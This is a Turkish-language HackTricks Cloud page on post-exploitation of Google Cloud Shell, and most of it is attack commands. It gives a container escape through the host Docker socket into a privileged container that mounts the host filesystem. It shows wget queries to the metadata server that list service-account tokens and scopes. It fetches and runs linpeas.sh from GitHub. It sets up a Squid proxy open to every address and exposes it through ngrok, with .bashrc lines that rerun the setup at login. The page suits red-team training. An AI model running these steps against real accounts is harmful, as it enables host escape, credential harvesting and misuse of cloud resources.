GCP - Cloud Shell Post Exploitation

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Cloud Shell

Cloud Shell hakkında daha fazla bilgi için kontrol edin:

GCP - Cloud Shell Enum

Konteyner Kaçışı

Google Cloud Shell'in bir konteyner içinde çalıştığını unutmayın, kolayca ana makineye kaçabilirsiniz:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Bu, Google tarafından bir zafiyet olarak kabul edilmez, ancak o ortamda neler olup bittiğine dair daha geniş bir bakış açısı sunar.

Ayrıca, ana bilgisayardan bir hizmet hesabı belirteci bulabileceğinizi unutmayın:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Aşağıdaki kapsamlarla:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

LinPEAS ile meta verileri listele:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

https://github.com/carlospolop/bf_my_gcp_permissions kullanarak Service Account'ın tokeni ile hiçbir izin keşfedilmedi...

Proxy Olarak Kullanma

Google Cloud Shell örneğinizi proxy olarak kullanmak istiyorsanız, aşağıdaki komutları çalıştırmanız (veya .bashrc dosyasına eklemeniz) gerekir:

sudo apt install -y squid

Sadece bilginiz için, Squid bir http proxy sunucusudur. Aşağıdaki ayarlarla bir squid.conf dosyası oluşturun:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

squid.conf dosyasını /etc/squid dizinine kopyalayın.

sudo cp squid.conf /etc/squid

Son olarak squid hizmetini çalıştırın:

sudo service squid start

ngrok'u kullanarak proxy'nin dışarıdan erişilebilir olmasını sağlayın:

./ngrok tcp 3128

tcp:// URL'sini kopyaladıktan sonra çalıştırın. Bir tarayıcıdan proxy çalıştırmak istiyorsanız, tcp:// kısmını ve portu kaldırmanız ve portu tarayıcı proxy ayarlarınızın port alanına girmeniz önerilir (squid bir http proxy sunucusudur).

Başlangıçta daha iyi kullanım için .bashrc dosyasında aşağıdaki satırlar olmalıdır:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Talimatlar https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key adresinden kopyalanmıştır. Cloud Shell'de her türlü yazılımı (veritabanları ve hatta Windows) çalıştırmak için diğer çılgın fikirler için o sayfayı kontrol edin.

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Cloud Run Post Exploitation NextGCP - Cloud SQL Post Exploitation

Last updated 3 days ago